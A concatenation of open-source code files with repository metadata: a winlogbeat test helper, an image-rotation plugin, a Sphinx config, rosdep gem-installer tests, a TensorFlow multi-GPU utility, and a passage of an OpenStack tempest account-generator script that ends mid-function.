    def assert_common_fields(self, evt, msg=None, eventID=10, sid=None,
                             level="Information", extra=None):
        """Assert the fields every winlogbeat event is expected to carry."""
        assert evt["computer_name"].lower() == platform.node().lower()
        assert "record_number" in evt
        self.assertDictContainsSubset({
            "event_id": eventID,
            "level": level,
            "log_name": self.providerName,
            "source_name": self.applicationName,
            "type": self.api,
        }, evt)
        if msg is None:
            assert "message" not in evt
        else:
            self.assertEquals(evt["message"], msg)
            self.assertDictContainsSubset({"event_data.param1": msg}, evt)
        if sid is None:
            # Events written without an explicit SID resolve to the current user.
            self.assertEquals(evt["user.identifier"], self.get_sid_string())
            self.assertEquals(evt["user.name"].lower(),
                              win32api.GetUserName().lower())
            self.assertEquals(evt["user.type"], "User")
            assert "user.domain" in evt
        else:
            self.assertEquals(evt["user.identifier"], sid)
            assert "user.name" not in evt
            assert "user.type" not in evt
        if extra is not None:
            self.assertDictContainsSubset(extra, evt)
|
{
"content_hash": "ecb41984e99a94c4ff3974418bf359e7",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 86,
"avg_line_length": 33.65873015873016,
"alnum_prop": 0.5772223532185805,
"repo_name": "christiangalsterer/execbeat",
"id": "fe79757f624aa0503500019dcb11606976a7d440",
"size": "4241",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "vendor/github.com/elastic/beats/winlogbeat/tests/system/winlogbeat.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Go",
"bytes": "7422"
},
{
"name": "Makefile",
"bytes": "1184"
},
{
"name": "Shell",
"bytes": "28"
}
],
"symlink_target": ""
}
|
import numpy as N
from traits.api import Range
from traitsui.api import View, VGroup, Item, EnumEditor
from TransformPlugin import TransformPlugin
class Rotator(TransformPlugin):
    """Transform plugin that rotates each frame by a multiple of 90 degrees."""
    # Number of counterclockwise quarter-turns (0-3) applied to each frame.
    rotation_angle = Range(0, 3)
    # TraitsUI layout: the plugin's enable checkbox plus a dropdown mapping
    # each quarter-turn count to a human-readable degree label.
    view = View(
        VGroup(
            Item('active'),
            Item('rotation_angle', editor=EnumEditor(values={
                0: u'0:0°',
                1: u'1:90°',
                2: u'2:180°',
                3: u'3:270°'
            })),
            label='Rotation',
            show_border=True))
    def _process(self, frame):
        """Return *frame* rotated counterclockwise by rotation_angle * 90 deg."""
        return N.rot90(frame, self.rotation_angle)
|
{
"content_hash": "eea9839af91b018b9ec1ebac2ec3cfd8",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 61,
"avg_line_length": 25.666666666666668,
"alnum_prop": 0.5422077922077922,
"repo_name": "ptomato/Beams",
"id": "5316cf5745480d711ae77ca02902780c0df8e40d",
"size": "634",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "beams/Rotator.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "57469"
}
],
"symlink_target": ""
}
|
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# Prepend the project root, the doc directory and this directory so autodoc
# can import the package being documented without an install step.
sys.path.insert(0, os.path.abspath('../../'))
sys.path.insert(0, os.path.abspath('../'))
sys.path.insert(0, os.path.abspath('./'))
# General configuration
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.intersphinx',
    'sphinx.ext.todo',
    'sphinx.ext.coverage',
    'sphinx.ext.pngmath',
    'sphinx.ext.ifconfig',
    'oslo.sphinx',
]
# Render todo:: directives (from sphinx.ext.todo above) in the built docs.
todo_include_todos = True
# Add any paths that contain templates here, relative to this directory.
templates_path = []
if os.getenv('HUDSON_PUBLISH_DOCS'):
    # The CI publishing job additionally pulls in the '_ga' templates
    # (presumably Google Analytics snippets — confirm against the repo).
    templates_path = ['_ga', '_templates']
else:
    templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'burrow'
copyright = u'2011-present, OpenStack Foundation'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
modindex_common_prefix = ['burrow.']
# Options for HTML output
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme = '_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = ['.']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'burrowdoc'
# Options for LaTeX output
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass)
# documentclass must be 'howto' or 'manual'.
# NOTE: author fixed from the misspelled "OpenStack, Founation" to match the
# `copyright` string earlier in this file.
latex_documents = [
    ('index', 'Burrow.tex', u'Burrow Documentation', u'OpenStack Foundation',
     'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'python': ('http://docs.python.org/', None)}
|
{
"content_hash": "e35467d2f8805d2666cd81b4b41c37c7",
"timestamp": "",
"source": "github",
"line_count": 195,
"max_line_length": 79,
"avg_line_length": 30.994871794871795,
"alnum_prop": 0.7220383851753805,
"repo_name": "emonty/burrow",
"id": "6c2cf03ec47b6fccc3ffaac495d147e2f3dafc89",
"size": "7026",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "doc/source/conf.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "7386"
},
{
"name": "Python",
"bytes": "161175"
}
],
"symlink_target": ""
}
|
import os
import traceback
from mock import Mock, patch
def get_test_dir():
    """Return the absolute path of the 'gem' fixture directory next to this file."""
    here = os.path.dirname(__file__)
    return os.path.abspath(os.path.join(here, 'gem'))
def test_gem_detect():
    """gem_detect must report only the requested gems present in `gem list`."""
    from rosdep2.platforms.gem import gem_detect
    exec_mock = Mock()
    # With an empty `gem list`, nothing can be detected.
    exec_mock.return_value = ''
    assert gem_detect([], exec_fn=exec_mock) == []
    assert gem_detect(['rdoc'], exec_fn=exec_mock) == []
    # Feed canned `gem list` fixture output through the mocked exec function.
    with open(os.path.join(get_test_dir(), 'list_output'), 'r') as f:
        exec_mock.return_value = f.read()
    detected = gem_detect(['rdoc'], exec_fn=exec_mock)
    assert detected == ['rdoc'], detected
    # Unknown gems ('fakito') are dropped; result order follows the listing.
    detected = gem_detect(['rdoc', 'fakito', 'rake'], exec_fn=exec_mock)
    assert detected == ['rake', 'rdoc'], detected
def test_GemInstaller_get_depends():
    """GemInstaller must honour the 'depends' key of a rosdep definition."""
    from rosdep2.platforms.gem import GemInstaller
    rule = {'depends': ['foo']}
    assert GemInstaller().get_depends(rule) == ['foo']
def test_GemInstaller():
    """Exercise GemInstaller.get_install_command with gem absent/present."""
    from rosdep2 import InstallFailed
    from rosdep2.platforms.gem import GemInstaller
    @patch('rosdep2.platforms.gem.is_gem_installed')
    def test_no_gem(mock_method):
        # If the `gem` tool itself is missing, asking for an install command
        # must raise InstallFailed.
        mock_method.return_value = False
        try:
            installer = GemInstaller()
            installer.get_install_command(['whatever'])
            assert False, "should have raised"
        except InstallFailed: pass
    test_no_gem()
    # NOTE: patch decorators are applied bottom-up, so the FIRST argument is
    # the get_packages_to_install mock and the SECOND is is_gem_installed.
    @patch('rosdep2.platforms.gem.is_gem_installed')
    @patch.object(GemInstaller, 'get_packages_to_install')
    def test(mock_method, mock_is_gem_installed):
        mock_is_gem_installed.return_value = True
        installer = GemInstaller()
        # Nothing missing -> no commands at all.
        mock_method.return_value = []
        assert [] == installer.get_install_command(['fake'])
        # no interactive option with GEM
        mock_method.return_value = ['a', 'b']
        expected = [['sudo', '-H', 'gem', 'install', 'a'],
                    ['sudo', '-H', 'gem', 'install', 'b']]
        val = installer.get_install_command(['whatever'], interactive=False)
        assert val == expected, val
        expected = [['sudo', '-H', 'gem', 'install', 'a'],
                    ['sudo', '-H', 'gem', 'install', 'b']]
        val = installer.get_install_command(['whatever'], interactive=True)
        assert val == expected, val
    try:
        test()
    except AssertionError:
        # Print the traceback so failures inside the patched closure are
        # visible in the test runner's output before re-raising.
        traceback.print_exc()
        raise
|
{
"content_hash": "7e0cb303376b8e85591e00a34e7d561e",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 76,
"avg_line_length": 32.733333333333334,
"alnum_prop": 0.5955193482688391,
"repo_name": "sorki/rosdep",
"id": "d9b80798e3492debbc31114f1a16b5ae9f8bc229",
"size": "4171",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "test/test_rosdep_gem.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "516"
},
{
"name": "Python",
"bytes": "395957"
},
{
"name": "Shell",
"bytes": "296"
}
],
"symlink_target": ""
}
|
import multiprocessing as mp
import traceback
from contextlib import contextmanager
import six
import tensorflow as tf
from tfsnippet.utils import (is_tensor_object,
is_tensorflow_version_higher_or_equal)
from .misc import cached
__all__ = ['detect_gpus', 'average_gradients', 'MultiGPU']
@cached
def detect_gpus():
    """
    Detect the GPU devices and their interconnection on current machine.

    Returns:
        list[list[str]]: List of GPU groups, each group is a list of
            GPU device names.  The GPUs in one group are interconnected.
    """
    def worker(q):
        # `device_lib` will not release the memory it took,
        # so we run it in a sub-process.
        # The sub-process reports back via `q`: (1, groups) on success,
        # (0, formatted traceback string) on failure.
        try:
            from tensorflow.python.client import device_lib
            if is_tensorflow_version_higher_or_equal('1.8.0'):
                # TF >= 1.8 accepts a session config here; allow_growth keeps
                # the probe from grabbing all GPU memory.
                config = tf.ConfigProto()
                config.gpu_options.allow_growth = True
                devices = list(device_lib.list_local_devices(config))
            else:
                devices = list(device_lib.list_local_devices())
            gpus = [
                (device.name, device)
                for device in devices
                if device.device_type == 'GPU'
            ]
            # Union-find over locality links: GPUs joined by a link end up in
            # the same group.  Initially each GPU is its own root.
            union_set = {i: i for i in range(len(gpus))}
            for i, (name, device) in enumerate(gpus):
                assert (device.name == '/device:GPU:{}'.format(i))
                for link in device.locality.links.link:
                    if link.device_id != i:
                        union_set[i] = union_set[link.device_id]
            # Path compression: point every entry directly at its root.
            for i in six.iterkeys(union_set):
                while union_set[i] != union_set[union_set[i]]:
                    union_set[i] = union_set[union_set[i]]
            root_devices = sorted(set(union_set.values()))
            gpu_groups = [[] for _ in range(len(root_devices))]
            dev_to_group = {j: i for i, j in enumerate(root_devices)}
            for i, (name, device) in enumerate(gpus):
                gpu_groups[dev_to_group[union_set[i]]].append(name)
            q.put((1, gpu_groups))
        except Exception:
            q.put((0, traceback.format_exc()))
    q = mp.Queue()
    p = mp.Process(target=worker, args=(q,))
    try:
        p.start()
        result = q.get()
        if result[0] == 1:
            return result[1]
        else:
            raise RuntimeError(
                'Failed to retrieve GPU information, the traceback of '
                'sub-process is:\n  {}'.
                format('\n  '.join(result[1].split('\n')))
            )
    finally:
        p.terminate()
        p.join()
def average_gradients(tower_grads):
    """
    Calculate the average gradient for each shared variable across all towers.
    Note that this function provides a synchronization point across all towers.
    Source:
        https://github.com/tensorflow/models/blob/master/tutorials/image/
        cifar10/cifar10_multi_gpu_train.py
    Args:
        tower_grads: List of lists of (gradient, variable) tuples. The outer
            list is over individual gradients. The inner list is over the
            gradient calculation for each tower.
    Returns:
        List of pairs of (gradient, variable) where the gradient has been
        averaged across all towers.
    """
    # Single tower: nothing to average.
    if len(tower_grads) == 1:
        return tower_grads[0]
    averaged = []
    for grads_and_vars in zip(*tower_grads):
        # grads_and_vars looks like:
        #   ((grad0_gpu0, var0_gpu0), ..., (grad0_gpuN, var0_gpuN))
        # Prepend a 'tower' dimension to each gradient, then average over it.
        stacked = tf.concat(
            axis=0,
            values=[tf.expand_dims(g, 0) for g, _ in grads_and_vars])
        mean_grad = tf.reduce_mean(stacked, 0)
        # The variables are shared across towers, so the first tower's
        # pointer to the variable is as good as any.
        shared_var = grads_and_vars[0][1]
        averaged.append((mean_grad, shared_var))
    return averaged
class MultiGPU(object):
    """
    Class to help build data-paralleled outputs and training operations.
    """

    def __init__(self, disable_prebuild=False):
        """
        Construct a :class:`MultiGPU`.

        Args:
            disable_prebuild: Whether or not to disable pre-build on CPU?
                Some operations (e.g., NCHW convolutional kernels) may not be
                supported by CPUs for the time being, thus the pre-building on
                CPUs might need to be disabled.
        """
        gpu_groups = detect_gpus()
        if not gpu_groups:
            # no GPU at all: do everything on CPU
            self._main_device = '/device:CPU:0'
        elif len(gpu_groups) != 1 and not disable_prebuild:
            # GPUs in different interconnection groups: keep variables on CPU
            self._main_device = '/device:CPU:0'
        else:
            self._main_device = gpu_groups[0][0]
        self._disable_prebuild = disable_prebuild
        self._gpu_devices = tuple(sum(gpu_groups, []))
        self._work_devices = self._gpu_devices \
            if self._gpu_devices else [self._main_device]

    @property
    def disable_prebuild(self):
        """Whether or not to disable pre-build on CPU?"""
        return self._disable_prebuild

    @property
    def main_device(self):
        """
        Get the main device name.

        Main device is the device for storing variables, and for gathering
        losses / gradients during training.  It may not be necessary one
        of the `work_devices`.  Do not run the model computation graph on the
        `main_device`, otherwise the `channels_last` parameter for
        convolutional layers might result in undesired behaviors.
        """
        return self._main_device

    @property
    def work_devices(self):
        """
        Get the names of the working devices.

        The model computation graph should be run only on these devices.
        Do not run them on the `main_device`, otherwise the `channels_last`
        parameter for convolutional layers might result in undesired
        behaviors.
        """
        return self._work_devices

    @property
    def gpu_devices(self):
        """Get the names of GPU devices."""
        return self._gpu_devices

    def is_gpu_device(self, device):
        """Check whether or not `device` is a GPU device."""
        return device in self._gpu_devices

    def channels_last(self, device):
        """
        Get the `channels_last` argument for `device`.

        It will be :obj:`True` for non-GPU devices, :obj:`False` for GPUs.
        Be careful if you want to build a model on both CPU and GPU devices,
        with ``channels_last = multi_gpu.channels_last(device)``.
        The convolutional layers will work as desired, but the dense layers
        after or before a convolutional layer will not work properly, unless
        special treatment is taken.
        """
        return device not in self._gpu_devices

    def data_parallel(self, batch_size, inputs):
        """
        Iterate through all devices and build the data-paralleled model.

        Args:
            batch_size (int or tf.Tensor): The size of each mini-batch.
            inputs (Iterable[tf.Tensor]): Input placeholders to be sliced
                for data parallelism.  The input placeholders will be sliced
                through the first dimension.

        Yields:
            str, bool, tuple[tf.Tensor]: ``(dev, pre_build, inputs)``,
                the device name, a flag indicating whether this is a
                pre-building pass for creating variables on CPU, and the
                tuple of sliced input placeholders.
        """
        inputs = list(inputs)
        # quick path: only one device, do not slice
        if len(self.work_devices) == 1:
            assert(self.main_device == self.work_devices[0])
            yield self.main_device, False, tuple(inputs)
        # slow path: multi-GPUs
        else:
            # the GPUs are not in the same group, place variables on CPU
            if self.main_device not in self.work_devices:
                yield self.main_device, True, tuple(inputs)
            # build the paralleled computation graph for each device
            with tf.name_scope('data_parallel') as ns:
                pass  # generate a name scope to place our data slicing ops
            k = len(self.work_devices)
            # ceil-divided slice length is loop-invariant; hoisted out of the
            # per-device / per-input loops so it is computed only once
            # (previously it was re-evaluated for every input of every tower).
            slice_len = (batch_size + k - 1) // k
            for i, device in enumerate(self.work_devices):
                dev_inputs = []
                with tf.name_scope(ns + 'tower_gpu_{}'.format(i)):
                    for inp in inputs:
                        low, high = slice_len * i, slice_len * (i + 1)
                        dev_inputs.append(inp[low: high])
                yield device, False, tuple(dev_inputs)

    @contextmanager
    def maybe_name_scope(self, device):
        """
        Generate a name scope if `device` is not `main_device`.

        Args:
            device (str): The name of the device.

        Yields
            The generated name scope, or None.
        """
        if device == self.main_device:
            yield
        elif device not in self._gpu_devices:
            with tf.name_scope('tower_cpu') as ns:
                yield ns
        else:
            gpu_id = self._gpu_devices.index(device)
            with tf.name_scope('tower_gpu_{}'.format(gpu_id)) as ns:
                yield ns

    def average_grads(self, grads):
        """
        Take the averaged gradients on the main device.

        Args:
            grads: List of lists of (gradients, variables) pairs.

        Returns:
            List of pairs of (gradient, variable) where the gradient has been
            averaged across all devices.
        """
        # quick path: only one device, just return the grads
        if len(grads) == 1:
            return grads[0]
        # slow path: multi-GPUs
        else:
            with tf.device(self.main_device), tf.name_scope('average_grads'):
                return average_gradients(grads)

    def apply_grads(self, grads, optimizer, global_step=None,
                    control_inputs=None):
        """
        Apply the gradients.

        Args:
            grads: List of (gradients, variables) pairs.
            optimizer: The TensorFlow optimizer.
            global_step: The optional global step counter.
            control_inputs: Dependency operations before applying the
                gradients.

        Returns:
            The operation of applying gradients.
        """
        def mk_op():
            return optimizer.apply_gradients(grads, global_step=global_step)

        with tf.device(self.main_device), tf.name_scope('apply_grads'):
            if control_inputs:
                with tf.control_dependencies(control_inputs):
                    return mk_op()
            else:
                return mk_op()

    def average(self, tensors, batch_size=None):
        """
        Take the average of given tensors from different devices.

        If `batch_size` is specified, the tensors will be averaged with
        respect to the size of data fed to each device.

        Args:
            tensors (list[list[tf.Tensor]]): List of tensors from each device.
            batch_size (None or int or tf.Tensor): The optional batch size.

        Returns:
            list[tf.Tensor]: The averaged tensors.
        """
        # check the arguments and try the fast path: only one tensor
        tensors = list(tensors)
        if not tensors:
            return []
        length = len(tensors[0])
        if length == 0:
            raise ValueError('`tensors` must be list of non-empty Tensor '
                             'lists.')
        for t in tensors[1:]:
            if len(t) != length:
                raise ValueError('`tensors` must be list of Tensor lists of '
                                 'the same length.')
        if length == 1:
            return [t[0] for t in tensors]
        # do the slow path: average all tensors
        with tf.device(self.main_device), tf.name_scope('average_tensors'):
            if batch_size is None:
                return [tf.reduce_mean(tf.stack(t), axis=0) for t in tensors]
            # weight each device's contribution by the share of the batch it
            # actually received (the last device may get a shorter slice)
            k = len(self.work_devices)
            slice_len = (batch_size + k - 1) // k
            last_slice_size = batch_size - (k - 1) * slice_len
            if is_tensor_object(batch_size):
                to_float = tf.to_float
            else:
                to_float = float
            float_batch_size = to_float(batch_size)
            weights = tf.stack(
                [to_float(slice_len) / float_batch_size] * (k - 1) +
                [to_float(last_slice_size) / float_batch_size]
            )
            return [tf.reduce_sum(tf.stack(t) * weights, axis=0)
                    for t in tensors]

    def concat(self, tensors):
        """
        Concat given tensors from different devices.

        Args:
            tensors (list[list[tf.Tensor]]): List of tensors from each device.

        Returns:
            list[tf.Tensor]: The concatenated tensors.
        """
        # check the arguments and try the fast path: only one tensor
        tensors = list(tensors)
        if not tensors:
            return []
        length = len(tensors[0])
        if length == 0:
            raise ValueError('`tensors` must be list of non-empty Tensor '
                             'lists.')
        for t in tensors[1:]:
            if len(t) != length:
                raise ValueError('`tensors` must be list of Tensor lists of '
                                 'the same length.')
        if length == 1:
            return [t[0] for t in tensors]
        # do the slow path: concat all tensors
        # (name scope fixed from 'average_tensors', an apparent copy-paste
        # from average() above; op names under this scope will change)
        with tf.device(self.main_device), tf.name_scope('concat_tensors'):
            return [tf.concat(t, axis=0) for t in tensors]
|
{
"content_hash": "13b16ad221d716ca160c27d9092bf913",
"timestamp": "",
"source": "github",
"line_count": 394,
"max_line_length": 80,
"avg_line_length": 35.86294416243655,
"alnum_prop": 0.5630573248407643,
"repo_name": "korepwx/tfsnippet",
"id": "fbb8531255233fb33dfd0df22a07bdb4eabbbbef",
"size": "14130",
"binary": false,
"copies": "1",
"ref": "refs/heads/dependabot/pip/tensorflow-2.5.3",
"path": "tfsnippet/examples/utils/multi_gpu.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "471912"
}
],
"symlink_target": ""
}
|
"""
Utility for creating **accounts.yaml** file for concurrent test runs.
Creates one primary user, one alt user, one swift admin, one stack owner
and one admin (optionally) for each concurrent thread. The utility creates
user for each tenant. The **accounts.yaml** file will be valid and contain
credentials for created users, so each user will be in separate tenant and
have the username, tenant_name, password and roles.
**Usage:** ``tempest-account-generator [-h] [OPTIONS] accounts_file.yaml``.
Positional Arguments
--------------------
**accounts_file.yaml** (Required) Provide an output accounts yaml file. Utility
creates a .yaml file in the directory where the command is ran. The appropriate
name for the file is *accounts.yaml* and it should be placed in *tempest/etc*
directory.
Authentication
--------------
Account generator creates users and tenants so it needs the admin credentials
of your cloud to operate properly. The corresponding info can be given either
through CLI options or environment variables.
You're probably familiar with these, but just to remind::
+----------+------------------+----------------------+
| Param | CLI | Environment Variable |
+----------+------------------+----------------------+
| Username | --os-username | OS_USERNAME |
| Password | --os-password | OS_PASSWORD |
| Tenant | --os-tenant-name | OS_TENANT_NAME |
+----------+------------------+----------------------+
Optional Arguments
------------------
**-h**, **--help** (Optional) Shows help message with the description of
utility and its arguments, and exits.
**-c /etc/tempest.conf**, **--config-file /etc/tempest.conf** (Optional) Path to
tempest config file.
**--os-username <auth-user-name>** (Optional) Name used for authentication with
the OpenStack Identity service. Defaults to env[OS_USERNAME]. Note: User should
have permissions to create new user accounts and tenants.
**--os-password <auth-password>** (Optional) Password used for authentication
with the OpenStack Identity service. Defaults to env[OS_PASSWORD].
**--os-tenant-name <auth-tenant-name>** (Optional) Tenant to request
authorization on. Defaults to env[OS_TENANT_NAME].
**--tag TAG** (Optional) Resources tag. Each created resource (user, project)
will have a prefix with the given TAG in its name. Using a tag is recommended
for later identification and cleanup of the resources.
**-r CONCURRENCY**, **--concurrency CONCURRENCY** (Required) Concurrency count
(default: 1). The number of accounts required can be estimated as
CONCURRENCY x 2. Each user provided in *accounts.yaml* file will be in
a different tenant. This is required to provide isolation between test for
running in parallel.
**--with-admin** (Optional) Creates admin for each concurrent group
(default: False).
To see help on specific argument, please do: ``tempest-account-generator
[OPTIONS] <accounts_file.yaml> -h``.
"""
import argparse
import netaddr
import os
from oslo_log import log as logging
import yaml
from tempest import config
from tempest import exceptions as exc
from tempest.services.identity.v2.json import identity_client
from tempest.services.network.json import network_client
import tempest_lib.auth
from tempest_lib.common.utils import data_utils
import tempest_lib.exceptions
LOG = None
CONF = config.CONF
def setup_logging():
    """Initialise oslo logging and bind the module-level LOG handle.

    Must be called before any function that uses LOG (it is None until then).
    """
    global LOG
    logging.setup(CONF, __name__)
    LOG = logging.getLogger(__name__)
def get_admin_clients(opts):
    """Build admin service clients from the parsed CLI options.

    Returns an (identity_admin, network_admin) pair; network_admin is None
    unless Neutron is available and isolated-network creation is enabled.
    """
    _creds = tempest_lib.auth.KeystoneV2Credentials(
        username=opts.os_username,
        password=opts.os_password,
        tenant_name=opts.os_tenant_name)
    auth_params = {
        'disable_ssl_certificate_validation':
            CONF.identity.disable_ssl_certificate_validation,
        'ca_certs': CONF.identity.ca_certificates_file,
        'trace_requests': CONF.debug.trace_requests
    }
    _auth = tempest_lib.auth.KeystoneV2AuthProvider(
        _creds, CONF.identity.uri, **auth_params)
    params = {
        'disable_ssl_certificate_validation':
            CONF.identity.disable_ssl_certificate_validation,
        'ca_certs': CONF.identity.ca_certificates_file,
        'trace_requests': CONF.debug.trace_requests,
        'build_interval': CONF.compute.build_interval,
        'build_timeout': CONF.compute.build_timeout
    }
    identity_admin = identity_client.IdentityClient(
        _auth,
        CONF.identity.catalog_type,
        CONF.identity.region,
        endpoint_type='adminURL',
        **params
    )
    network_admin = None
    # Only build the network client when it will actually be used.
    if (CONF.service_available.neutron and
            CONF.auth.create_isolated_networks):
        network_admin = network_client.NetworkClient(
            _auth,
            CONF.network.catalog_type,
            CONF.network.region or CONF.identity.region,
            endpoint_type='adminURL',
            **params)
    return identity_admin, network_admin
def create_resources(opts, resources):
    """Create the tenants, users, networks and role assignments described
    by *resources* in the cloud addressed by *opts*.

    :param opts: parsed CLI options carrying admin credentials and tag.
    :param resources: dict with 'tenants' (list of names) and 'users'
        (list of dicts), as produced by generate_resources().
    :raises exc.InvalidConfiguration: if a requested role does not exist.
    """
    identity_admin, network_admin = get_admin_clients(opts)
    roles = identity_admin.list_roles()
    for u in resources['users']:
        u['role_ids'] = []
        for r in u.get('roles', ()):
            # Map each requested role name to its id, failing fast on unknown
            # roles.  A list comprehension is used instead of the former
            # filter(...)[0]: on Python 3 filter() returns an iterator and is
            # not subscriptable, while the comprehension keeps the original
            # IndexError path on both interpreters.
            try:
                role = [r_ for r_ in roles if r_['name'] == r][0]
            except IndexError:
                msg = "Role: %s doesn't exist" % r
                raise exc.InvalidConfiguration(msg)
            u['role_ids'] += [role['id']]
    existing = [x['name'] for x in identity_admin.list_tenants()['tenants']]
    for tenant in resources['tenants']:
        if tenant not in existing:
            identity_admin.create_tenant(tenant)
        else:
            LOG.warn("Tenant '%s' already exists in this environment" % tenant)
    LOG.info('Tenants created')
    for u in resources['users']:
        try:
            tenant = identity_admin.get_tenant_by_name(u['tenant'])
        except tempest_lib.exceptions.NotFound:
            LOG.error("Tenant: %s - not found" % u['tenant'])
            continue
        while True:
            try:
                identity_admin.get_user_by_username(tenant['id'], u['name'])
            except tempest_lib.exceptions.NotFound:
                identity_admin.create_user(
                    u['name'], u['pass'], tenant['id'],
                    "%s@%s" % (u['name'], tenant['id']),
                    enabled=True)
                break
            else:
                # Name collision: draw a fresh random name and retry.
                LOG.warn("User '%s' already exists in this environment. "
                         "New name generated" % u['name'])
                u['name'] = random_user_name(opts.tag, u['prefix'])
    LOG.info('Users created')
    if network_admin:
        for u in resources['users']:
            tenant = identity_admin.get_tenant_by_name(u['tenant'])
            network_name, router_name = create_network_resources(network_admin,
                                                                 tenant['id'],
                                                                 u['name'])
            u['network'] = network_name
            u['router'] = router_name
        LOG.info('Networks created')
    for u in resources['users']:
        try:
            tenant = identity_admin.get_tenant_by_name(u['tenant'])
        except tempest_lib.exceptions.NotFound:
            LOG.error("Tenant: %s - not found" % u['tenant'])
            continue
        try:
            user = identity_admin.get_user_by_username(tenant['id'],
                                                       u['name'])
        except tempest_lib.exceptions.NotFound:
            # Bug fix: this read u['user'], a key that never exists in the
            # user dicts (see generate_resources), so the handler itself
            # raised KeyError instead of logging the missing user.
            LOG.error("User: %s - not found" % u['name'])
            continue
        for r in u['role_ids']:
            try:
                identity_admin.assign_user_role(tenant['id'], user['id'], r)
            except tempest_lib.exceptions.Conflict:
                # don't care if it's already assigned
                pass
    LOG.info('Roles assigned')
    LOG.info('Resources deployed successfully!')
def create_network_resources(network_admin_client, tenant_id, name):
    """Create a network, subnet and router for one tenant.

    Resource names are derived from the user *name*.  Returns the
    (network_name, router_name) pair.
    """
    def _create_network(name):
        resp_body = network_admin_client.create_network(
            name=name, tenant_id=tenant_id)
        return resp_body['network']
    def _create_subnet(subnet_name, network_id):
        # Walk candidate CIDRs carved out of the configured tenant network
        # until one does not overlap an already-allocated subnet.
        base_cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
        mask_bits = CONF.network.tenant_network_mask_bits
        for subnet_cidr in base_cidr.subnet(mask_bits):
            try:
                resp_body = network_admin_client.\
                    create_subnet(
                        network_id=network_id, cidr=str(subnet_cidr),
                        name=subnet_name,
                        tenant_id=tenant_id,
                        enable_dhcp=True,
                        ip_version=4)
                break
            except tempest_lib.exceptions.BadRequest as e:
                # Only overlap errors mean "try the next CIDR"; anything
                # else is a real failure.
                if 'overlaps with another subnet' not in str(e):
                    raise
        else:
            # for/else: every candidate CIDR overlapped.
            message = 'Available CIDR for subnet creation could not be found'
            raise Exception(message)
        return resp_body['subnet']
    def _create_router(router_name):
